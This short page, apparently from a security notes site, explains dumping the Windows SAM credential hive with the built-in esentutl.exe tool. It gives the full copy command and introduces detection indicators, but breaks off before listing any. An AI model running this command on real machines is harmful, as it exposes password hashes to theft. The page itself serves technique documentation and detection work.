Last updated 4 years ago
Was this helpful?
It's possible to use esentutl.exe that comes with Windows and dump SAM/Security hives like so:
esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam
The below are some potential IOCs for detecting this technique: